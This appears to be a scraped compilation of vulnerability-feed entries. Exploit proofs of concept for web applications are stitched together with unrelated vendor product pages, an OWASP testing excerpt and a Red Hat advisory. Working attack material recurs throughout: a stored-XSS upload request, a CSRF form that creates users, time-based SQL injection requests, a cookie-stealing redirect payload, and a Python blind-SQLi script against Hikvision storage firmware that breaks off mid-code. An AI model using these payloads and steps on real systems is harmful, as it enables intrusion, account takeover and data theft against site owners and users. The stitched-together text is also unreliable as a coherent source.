Listplace Directory Listing Platform version 3.0 suffers from an arbitrary file upload vulnerability that can assist in cross site scripting attacks.

    # Exploit Title: Listplace Directory Listing Platform 3.0 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 12/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/listplace-a-complete-directory-listing-platform/22# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard] go to [Profile Settings] on this Path: https://website/listplace/user/profile3. Upload any Image to [User_Cover_Photo]4. Capture the POST Request with [Burp Proxy Intercept]5. Inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /listplace/user/coverPhotoUpdate HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="user_cover_photo"; filename="XSS.png"Content-Type: image/png<script>alert(1)</script>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/listplace/assets/uploads/users/[Stored-XSS][-] Done

Listplace Directory Listing Platform 3.0 File Upload / Cross Site Scripting

CMS Contabil Bandeirantes version 1.0.0 suffers from a cross site request forgery vulnerability.

======================================================================================================================================  
| # Title     : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                            |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              |  
| # Vendor    : https://scriptmafia.org/                                                                                             |    
======================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/addUser.php 

[+] Save code as poc.html 

<section id="main" class="column" style="height: 680px;">

        <h4 class="alert_info">Necessário preencher todos os campos.</h4>  
        

        <article class="module width_full">  
      <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
        <header><h3>Adicionar Usuários</h3></header>

                      <div class="module_content">  
                <fieldset>  
                  <label>Nome</label>  
                  <input name="nome" id="nome" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Email</label>  
                  <input name="email" id="email" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Senha</label>  
                  <input name="senha" id="senha" value="" type="text">  
                </fieldset>  
                <div class="clear"></div>  
            </div>    
        <footer>  
          <div class="submit_link">  
            <input id="limpar" name="limpar" value="limpar" type="submit">  
            <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
          </div>  
        </footer>  
      </form>    
    </article>

                    <div class="spacer"></div>  
  </section>

  Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

A memory corruption vulnerability Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.

   

With the innovative programming software Control FPWIN Pro, it takes minimal effort to achieve a maximum result with the PLCs.

**Programming software Control FPWIN Pro**

Control FPWIN Pro is the Panasonic programming software developed according to the international standard IEC 61131-3 (for Windows 10 and 11). Numerous libraries that incorporate a lot of our know-how ensure the reusability of ready-made functions and function blocks and save time for programming and debugging.

**Features**

1.  Structured Text (ST) programming editor
2.  Toolbar contains icons, which represents frequently used menus
3.  Delaration of variables
4.  Navigator provides an overview even for very complex projects
5.  Selection of Functions / Function blocks
6.  Ladder Diagram (LD) programming editor

**The most important FPWIN Pro highlights at a glance**

*   One software for all FP Series PLCs
*   5 programming languages (instruction list, ladder diagram, function block diagram, sequential function chart, structured text)
*   Well structured navigator provides effective overview of programming organizaton units (POUs), tasks, system registers, etc., simplifying project management
*   Reuse of ready made functions and function blocks saves time for programming and debugging
*   Programming, service, monitoring and diagnostics via RS232 (COM), Modem, Ethernet, USB
*   Forced ON/OFF of input and output contacts via the PC
*   Extensive comments - online documentation created hand in hand with the program
*   The name of variables, functions, function blocks and comments can be written in all languages thanks to Unicode
*   Improved programming comfort: snap function, automatic placement of newly inserted elements, existing connection retained while moving elements
*   Keyboard-control mode can accelerate programming
*   8 languages are supported: English, German, French, Italian, Spanish, Japanese, Korean, and Chinese
*   Real-time clock on the PLC can be set in the Software
*   All IEC functions support the FP7
*   New communication and pointer functions
*   New family of overloaded and type-safe instructions for 32-bit type PLCs (FP7) and 16-bit type PLCs
*   SD card instructions 

**Control FPWIN Pro ordering data**

Product

Order Number

License for Control FPWIN Pro V7. Programming software, full version for all FP series PLCs (including FP7)

FPWINPRO7\_LICENSE

**More information**

Video-tutorials

**Basic PLC video training**

Basic PLC course, giving an overview about programming with FPWIN Pro 7 software.

SErvice

**Control FPWIN Pro7**

Download software files and programming libraries for motion control and network protocols.

**Downloads**

Name

File Type

Size

Date

Language

PDF Brochure Automates programmables industriels

Catalog, Shortform

5.9 MB

09.04.2021

French

PDF Catálogo Resumen Autómatas Programables

Catalog, Shortform

13.3 MB

21.01.2022

Spanish

PDF Catálogo resumen - Gama de producto automatización industrial, 6215eues

Catalog, Shortform

5.9 MB

01.08.2021

Spanish

ZIP Control Configurator FM for integration in FPWIN Pro 7. Network Configurator including diagnostic functions for FP0H / FP2 / FP-Sigma Fieldbus Master Units(FMU).

Software

45.7 MB

09.09.2010

English

ZIP Control Configurator WD Version 1.77: setting software for Ethernet communication of FP7, FP0H, ELC500, Data Logger Light, PV200/500, HL-C21C, GT32T1/703/704, AFPX-COM5, FP-XH Ethernet type, LP-GS, K…

Software

7.3 MB

24.02.2021

English

PDF Control FPWIN Pro

Data sheet

835.3 KB

12.11.2018

German

PDF Control FPWIN Pro

Data sheet

833.7 KB

12.11.2018

English

PDF Control FPWIN Pro Befehlssatz

Manual

22.3 MB

01.12.2012

English

PDF Control FPWIN Pro Programming Manual

Manual

20.3 MB

01.07.2012

English

ZIP Control FPWIN Pro V 6.0 Reference Manual

Manual

5.5 MB

01.10.2008

English

ZIP Control FPWIN Pro V 6.0 Referenzhandbuch

Manual

5.9 MB

German

PDF Control FPWIN Pro, Programmation des automates : un logiciel pour toutes les applications

Data sheet

769.6 KB

French

ZIP Control FPWIN Pro7, free basic version 7.7.0.0 Supports all PLCs including the FP7, PLC program length limitation is 10000 steps. This version can update an older basic version. For Windows 10/11.

Software

462.6 MB

22.06.2023

English, german, italian, french, spanish, japanese, chinese, korean

ZIP Ethernet Client FPWIN Pro 7 library, Version 1.4.0. FBs, HTTP\_Client, FTP\_Client and EMAIL\_Client, for FP7CPS31ES, FP7CPS31E, FP7CPS41E, FP7CPS41ES. FB FTP\_Client for AFP0HC32EP and AFP0HC32ET.

Software, Library

990.3 KB

15.10.2021

English

PDF FP I/O Terminal Board Installation Instructions, MJEC-FPIOTB

Manual

1.1 MB

11.07.2022

English

PDF FP Serie Controllori Programmabili

Catalog, Shortform

13.4 MB

Italian

ZIP FP0DPS2 PROFIBUS DP-Slave GSD-File

Software, Library

1.2 KB

01.08.2008

English

PDF FP0H Positioning Unit RTEX User's Manual (FPWIN Pro7), WUME-FP0HRTEXPRO7-07

Manual

8.7 MB

14.02.2023

English

ZIP FP7 AD4 and AD8 software for reading analog inputs plus broken wire dedection. Small user library and sample program for FPWIN Pro 7.

Software, Library

32.1 KB

12.01.2022

English

PDF FPWIN Pro

Data sheet

775.5 KB

28.01.2016

Italian

ZIP FPWIN Pro project sample for FP7 AD4H/AD8 to read the analog input sampling buffer.

Software

11.2 KB

05.06.2018

English

ZIP FPWIN Pro projects in LD and ST code for positioning operations using the pulse output function. (Examples related to FP Sigma User's Manual.)

Software, Programming examples

872.1 KB

01.10.2011

English

ZIP FPWIN Pro projects in LD and ST code for positioning operations using the pulse output function. (Examples related to FP-X User's Manual.)

Software, Programming examples

934.4 KB

01.10.2011

English

ZIP FPWIN Pro projects in LD and ST code for positioning operations with a single-speed and a double-speed inverter. (Examples related to FP-X, FP Sigma, and FP0R User's Manuals.)

Software, Programming examples

306.5 KB

01.10.2011

English

PDF FPWIN Pro7 Introduction Guidance, WUME-FPWINPRO7-01

Manual

4.4 MB

16.07.2019

English

ZIP Fieldbus Master Module (FMU) Library for PROFIBUS-DP, DeviceNet and CANopen (FP-Sigma, FP2)

Software, Library

124.2 KB

01.08.2008

English

ZIP Fieldbus Master Units (FMU) Profibus, Profinet, CANopen and DeviceNet for FP7. Libraries, Samples and Docu V. 1.0.1.0 (for the use in FPWIN Pro 7).

Software, Library

4.5 MB

03.07.2018

English

ZIP Fieldbus Slave Unit(FNS) Libraries for FP0H, FP2 and FP-Sigma. Supported FNS slaves are PROFIBUS, DeviceNet, CANopen, BACnetIP, BACnetMSTP and PROFIINET IO. GSD, EDS and GSDML files are included. FPW…

Software, Library

835.9 KB

05.02.2021

English

PDF IEC60870: la nostra risposta a tante domande

Flyer

4.5 MB

Italian

ZIP Laser Marker Library

Software, Library

4.5 MB

01.03.2010

PDF Les essentiels - Produits d’automatisme, 6215eufr

Catalog, Shortform

5.5 MB

16.06.2023

French

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS A5B/A6B Series, EtherCAT,Version 1.1.0, Included Demo Program. Supported PLCs: FP7

Software, Library

3.4 MB

30.06.2020

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS A5N/A6N Series, RTEX, Version 1.0.0.0, Included Demo Program. Supported PLC: FP-XH

Software, Library

1.7 MB

19.04.2018

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS A6 Series, Modbus RTU, Version 2.1.0.2, Included Demo Program. Supported PLCs: FP0R, FP-Sigma, FP-X, FP7, FP0H

Software, Library

4.7 MB

12.02.2020

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS BL Series, RS485 Serial Protocol, Version 2.2.0.0, Included Demo Program. Supported PLCs: FP-0R, FP-Sigma, FP-X, FP-0H, FP-XH, FP7(for COM ports o…

Software, Library

13.7 MB

08.04.2019

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS LIQI/A5/A6 Series, Pulse Train Output, Version 1.0.1.0, Included Demo Program. Supported PLCs: FP0H, FP-XH

Software, Library

1.6 MB

21.07.2021

English

ZIP Motion & Communication Library for MINAS A5 / A6 Series, Pulse Output Control with Multi I/O Unit, Version 1.0.0.0, Included Demo Program. Supported PLCs: FP7

Software, Library

3.9 MB

12.12.2017

English

ZIP Motion & Communication Library for MINAS A5 / A6 Series, Pulse Output Control with Positioning Unit, Version 1.5.0.0, Included Demo Program. Supported PLCs: FP7

Software, Library

2.9 MB

12.12.2017

English

ZIP Motion & Communication Library for MINAS A5N/A6N Series, RTEX, Version 1.2.4, Included Demo Program. Supported PLCs: FP-0H

Software, Library

24.7 MB

24.01.2023

English, German

ZIP Motion & Communication Library for MINAS A5N/A6N Series, RTEX, Version 2.2.0.0, Included Demo Program. Supported PLCs: FP-Sigma

Software, Library

799.8 KB

12.02.2018

English

ZIP Motion Control Library for MINAS LIQI / A5 / A6 Series, Pulse Output Control with compact PLCs, Version 1.0, Included Demo Program. Supported PLCs: FP0R, FP-Sigma, FPX, FP7

Software, Library

1.3 MB

12.12.2017

English

PDF Overview Programmable Logic Controllers

Catalog, Shortform

6 MB

18.10.2021

English

PEW-CONTROL-DRIVER-A4-VIA-RS485 Library

Software, Library

55.4 KB

01.07.2009

ZIP PEW\_A5\_A6\_RS232 Library

Software, Library

3.6 MB

28.04.2015

English

ZIP Software tool used for switching FP0R PLC types from FP0R mode into FP0 mode. After that FP0R PLC can be programmed with software tools supporting FP0.

Software

35.2 MB

17.07.2013

English

ZIP Solar Tracking Library

Software, Library

2.2 MB

01.02.2011

PDF Soluzioni Compact Motion - Dedicate ai costruttori di macchine, MC09/2018-2000

Catalog

7.6 MB

03.09.2018

Italian

PDF Telecontrol: catalogo resumido

Catalog, Shortform

1.1 MB

Spanish

PDF Top seller - Automation products, 6215euen

Catalog, Shortform

15.7 MB

04.05.2023

English

ZIP User library 3964R 3.02 - function blocks for 3964R/RK512 procedure (incl. Engl. a. German online) ( TB-3964R )

Software, Library

4.8 MB

12.12.2016

English, German

ZIP User library ACRON - function blocks ACRON / ACRON connect ( incl. German online)

Software, Library

4.7 MB

ZIP User library GPRS 3.2.2.0 - function blocks for GPRS communication (for FPWIN Pro 7 or newer, incl. English and German online help)

Software, Library

11.8 MB

30.06.2022

English, German

ZIP User library IEC60870 2.611- function blocks for remote control with the IEC 60870-5 standard protocol (for FPWIN Pro 5 and 6, incl. English and German online help)

Software, Library

17.1 MB

09.05.2016

English, German

ZIP User library IEC60870 3.11- function blocks for remote control with the IEC 60870-5 standard protocol (for FPWIN Pro 7 and newer, incl. English and German online help)

Software, Library

17.7 MB

09.05.2016

English, German

User library MBUS - M-Bus master software functions (incl. German online) ( TB-MBUS )

Software, Library

4.2 MB

07.01.2015

English

ZIP User library MoP, V. 1.31 – Function blocks for time slot technique and multipoint connection (for FPWIN Pro 5 and 6, incl. German online help) (TB-MOP)

Software, Library

4.1 MB

01.10.2010

English

ZIP User library MoP, V.2.00 – Function blocks for time slot technique and multipoint connection (for FPWIN Pro 7 and newer, incl. German online help) (TB-MOP)

Software, Library

4.5 MB

15.06.2015

English

User library Modbus RTU - function blocks for Modbus communication with FP-G(FPG951)MCU, (incl. English online help)

Software, Library

177.1 KB

28.04.2015

English

User library Modbus RTU - function blocks for Modbus communication with FP2, FP2 MCU, FP0 and FP-G(FPG951)MCU, not necessary for FP0R, FP-X, FP-G and FP7, (incl. English, German a. Italian online hel…

Software, Library

6.1 MB

07.04.2015

English, German, Italian

ZIP User library PTC - function blocks for process and temperature control (incl. German a. English online help)

Software, Library

5.8 MB

01.02.2013

English

User library SEAB-1F - Software functions to communicate to AEG-telecontrol (master, slave (incl. German online)

Software, Library

4.9 MB

23.09.2014

English, German

ZIP User library for reading ECO POWER METERS (KW1M, KW2M and KW9M)

Software, Library

1.2 MB

10.04.2018

English

ZIP User library timelib 4.1 - function blocks for UNIX/IEC-compliant time for FPWIN Pro 6 and FPWIN Pro 7 (incl. German online help)

Software, Library

2.8 MB

12.12.2016

PDF Übersicht Speicherprogrammierbare Steuerungen

Catalog, Shortform

13.3 MB

02.12.2021

German

PDF Übersicht Topseller Automatisierungstechnik, 6215eude

Catalog, Shortform

15.6 MB

24.04.2023

German

ZIP Control FPWIN Pro7, full and update version 7.7.0.0 FULL: For a full version buy a license separately. Article no. is " FPWINPRO7\_LICENSE ". Please order it at your local Panasonic sales contact. Thi…

Software

462.7 MB

22.06.2023

English, german, italian, french, spanish, japanese, chinese, korean

ZIP FPWIN Pro GSM alarm notification library (NCL-CCMS-LIB) version 1.200, Windows Configuration software (SetupControlConfiguratorMSLib1.102) and manuals. The FPWIN Pro libraries in "NCL-CCMS-LIB" cont…

Software, Library

30.9 MB

02.09.2015

English, German

ZIP FPGT Loader, Vers.2.2.2.0, is a utility for up-/downloading data to and from GT panels(GT01, GT02, GT03-E, GT11, GT21, GT05, GT12, GT32) and PLCs(FP0, FP0R, FP0H, FP7, FP2, FP2SH, FP-Sigma, FP-X, FP-…

Software

79.3 MB

10.08.2021

English, German, Spanish

CVE-2023-28730: Programming Software Control FPWIN Pro

SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Proof of Concept for CVE-2023-31753

Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into "rid" parameter in diskusi.php.

*   Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
*   Date: May 19, 2023
*   Exploit Author: Kunal Khubchandani
*   Vendor Homepage: http://www.endonesia.org/
*   Software Link: https://sourceforge.net/projects/endonesia/
*   Version: 8.7
*   Category: Webapps
*   Tested on: WiN11\_x64/KaLiLinuX\_x64
*   CVE : CVE-2023-31753

#POC:

1.  To exploit this vulnerability, one must send a SQLi sleep payload as a value of "rid" GET Parameter in the following HTTP request.
    
2.  Vulnerable Request:
    

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select\*from(select(sleep(20)))a) HTTP/1.1  
Host: TARGET  
Accept-Encoding: gzip, deflate  
Accept: _/_  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  

3.  Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.

\*\* 20 Seconds Delay:

\*\* 30 Seconds Delay:

CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

SeedDMS v6.0.15 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Testing for Client Side URL Redirect**

ID

WSTG-CLNT-04

**Summary**

This section describes how to check for client side URL redirection, also known as open redirection. It is an input validation flaw that exists when an application accepts user-controlled input that specifies a link which leads to an external URL that could be malicious. This kind of vulnerability could be used to accomplish a phishing attack or redirect a victim to an infection page.

This vulnerability occurs when an application accepts untrusted input that contains a URL value and does not sanitize it. This URL value could cause the web application to redirect the user to another page, such as a malicious page controlled by the attacker.

This vulnerability may enable an attacker to successfully launch a phishing scam and steal user credentials. Since the redirection is originated by the real application, the phishing attempts may have a more trustworthy appearance.

Here is an example of a phishing attack URL.

    http://www.target.site?#redirect=www.fake-target.site
    

The victim that visits this URL will be automatically redirected to fake-target.site, where an attacker could place a fake page that resembles the intended site, in order to steal the victim’s credentials.

Open redirection could also be used to craft a URL that would bypass the application’s access control checks and forward the attacker to privileged functions that they would normally not be able to access.

**How to Test**

When testers manually check for this type of vulnerability, they first identify if there are client side redirections implemented in the client side code. These redirections may be implemented, to give a JavaScript example, using the window.location object. This can be used to direct the browser to another page by simply assigning a string to it. This is demonstrated in the following snippet:

    var redir = location.hash.substring(1);
    if (redir)
        window.location='http://'+decodeURIComponent(redir);
    

In this example, the script does not perform any validation of the variable redir which contains the user-supplied input via the query string. Since no form of encoding is applied, this unvalidated input is passed to the windows.location object, creating a URL redirection vulnerability.

This implies that an attacker could redirect the victim to a malicious site simply by submitting the following query string:

    http://www.victim.site/?#www.malicious.site
    

With a slight modification, the above example snippet can be vulnerable to JavaScript injection.

    var redir = location.hash.substring(1);
    if (redir)
        window.location=decodeURIComponent(redir);
    

This can be exploited by submitting the following query string:

    http://www.victim.site/?#javascript:alert(document.cookie)
    

When testing for this vulnerability, consider that some characters are treated differently by different browsers. For reference, see DOM-based XSS.

CVE-2021-39425: WSTG - v4.1 | OWASP Foundation

An issue was discovered in SteelSeries GG 36.0.0. An attacker can change values in an unencrypted database that is writable for all users on the computer, in order to trigger code execution with higher privileges.

**GET MORE OUT OF YOUR GAME**

SteelSeries GG helps create better connections with your gear, your people and your game.

Free Download

Check your email

Send the download link to your email

Windows 10+

Free Download

Check your email

Send the download link to your email

macOS 10.13+

**3D AIMTRAINER**

Improve your aim faster and rank up in your favorite FPS game. Play hundreds of fun exercises at your fingertips for free.

**Sync Your Game**

Match your sensitivity and FOV settings from your game for the best training experience.

**Test Your Aim**

Get insights to discover the weak points holding you back from being a better player.

**Train To Improve**

Get better faster with focused aim practice and fun exercises for every shooting skill.

Free Download

Check your email

Send the download link to your email

**SONAR**

Pinpoint your enemy's location long before you see them with Sonar, a breakthrough in gaming sound. Hear what others miss.

**Parametric EQ**

Amplify or reduce specific in-game sounds to hear key soundsclearer than ever.

**Audio Mixer**

As a first in gaming, you can now set separate equalizer settings for your game and chat.

**Microphone EQ**

Make yourself sound way better and remove noise for crystal clear comms to your team.

Free Download

Check your email

Send the download link to your email

**MOMENTS**

Windows Only

Moments is the easiest way to capture your favorite gaming moments and share them anywhere you want.

**Capture**

Use a custom hotkey to seamlessly capture moments after they happen.

**Clip**

Edit or trim moments in-platform from an intuitive gallery.

**Share**

Generate share links to anywhere or directly upload to select platforms.

Free Download

Check your email

Send the download link to your email

**ENGINE**

Engine is a low impact application for all your gaming rig settings like illumination, macros, binds and more.

**My gear**

Connect a SteelSeries Engine enabled device to start your customization.

**Illumination**

Set dynamic lighting effects between compatible SteelSeries devices.

**Engine Apps**

Trigger config settings in game-specific apps or enable other utility apps.

Free Download

Check your email

Send the download link to your email

**FAQ**

Yes. When Engine updates to GG, all of your device configs and settings are carried to GG, just as they were when updating to a new version of Engine. Any settings will also be persisted on future versions of GG.

After opting-in to be our software beta tester you'll automatically be updated to early versions of new features and updates. We might also send you the odd survey to hear about your experience, so we can work with you to create the best possible experience.

If you have any issues or prefer the old version you always can go back after you've been updated.

Simply disable the early release opt-in in GG, under “Settings” -> “General”.

We appreciate any feedback or comments as it helps us immensely in making a great product for everyone to enjoy.

CloudSync has been removed from Engine for now since it did not live up to your needs.

We're reconsidering how to develop a better version and hope to bring it back in the near future with even more features!

If you don’t want to use an app such as Moments, you can turn it off in the settings. When turned off it will not effect your performance and will not run in the background.

The same goes for SteelSeries Engine. If you don’t have a SteelSeries device plugged in, the Engine application inside GG will not be running in the background.

To turn Moments off you can do either of the following:  
1\. Click the dropdown menu above the Moments gallery and turn off “Gameplay capture”  
2\. Go to Settings -> Capture and Sound -> Turn off “Allow Moments to capture while gaming”

**DEVELOPER**

**CHANGELOG**

**SUPPORT**

CVE-2023-31462: SteelSeries GG

Red Hat Security Advisory 2023-4211-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for Windows serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 17.0.8 Security Update for Windows Builds  
Advisory ID:       RHSA-2023:4211-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4211  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22044 CVE-2023-22045 CVE-2023-22049   
                   CVE-2023-25193   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and  
the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.8) for Windows serves  
as a replacement for the Red Hat build of OpenJDK 17 (17.0.7) and includes  
security and bug fixes, and enhancements. For further information, refer to  
the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: modulo operator array indexing issue (8304460) (CVE-2023-22044)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221642 - CVE-2023-22044 OpenJDK: modulo operator array indexing issue (8304460)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22044  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTH6AAoJENzjgjWX9erE4X4P/i5/rql5+gQUR0Q8hMR1jR7i  
oyQ3IqPXm4uCoPfmoiSwG1PSClZVXNvIn3q1Cw34mWGMyi1imvmLzVME4S6rPGFm  
00BaF3Ox/ZB7/e9PzXcdGp7bzKwhmBe9/CTPDFRFlb5pL/csYbyK7j5wfn+2z1et  
nv7ZxyzMIAgl7VKonNUDAwqfs0tsjcKd16esckctGN5jaBnfUvb7OO4IoO8qHZ2Q  
YLMzs+eGmH9LhR488iqhz/OspNWYpDG+rxs3loj/a9yml0sqvCzR7HSALRD40jdl  
xDuyq+aHccxB+NcufJRRt1z+5fE1AsTivtsCnln906hoOvUjSWIKBlgsU4eSoZS3  
ZEkBppfUdiF27TX6eP4ubVSR2R8r1GHjjWJqY9drb+NG2E9UlZO1Lchqn8OpaAYC  
7RNonxtWDFvgCiC0zy3BbpX9Usgya2ju1mtDV0JN8XtUVfImDjpXrizfWh0VX87Z  
8+xuJnOv6sx3HJkvuE2xCLksSgbUQKrWN+RZdf5GTT5PDzVCYmjc5puPEXjKVgv5  
aAyS8R0nMzWPi12YEuEdDeoRSa0xNWpPkkGDI00FzIdohMQGOprTUauVyGeUrZ4x  
qPnfMpubxAjhujXUhhY7Agx3lU4DE+0adE+y5v9WYIERH4bf8MxJtQcrZHzhztwj  
ZupA95pk0sl6OzsyD5GA  
=pb7k  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4211-01

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 